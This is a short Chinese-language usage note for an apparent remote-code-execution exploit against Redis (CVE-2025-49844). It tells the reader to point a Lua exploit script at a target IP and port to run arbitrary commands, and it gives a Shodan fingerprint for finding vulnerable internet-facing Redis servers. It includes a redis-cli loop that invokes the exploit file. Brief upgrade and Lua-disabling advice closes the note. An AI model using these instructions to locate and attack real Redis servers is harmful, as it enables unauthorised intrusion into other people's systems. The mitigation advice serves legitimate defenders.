简单来说,运行这个脚本,把
localhost
替换成目标IP,然后设置好端口,如果目标存在漏洞就能连接上,你可以执行任意想要的命令。
在Shodan中,你也可以用这个指纹来查找存在漏洞的目标
product:"Redis key-value store"
检查版本是否低于8.2
while redis-cli -h localhost -p 6379 --eval CVE-2025-49844.lua >/dev/null; do
printf 'connect to server :) RCE'
done
如果可以,请将Redis升级到8.2.2或更高版本。
如果无法升级,至少要对未知或不可信用户禁用Lua执行功能。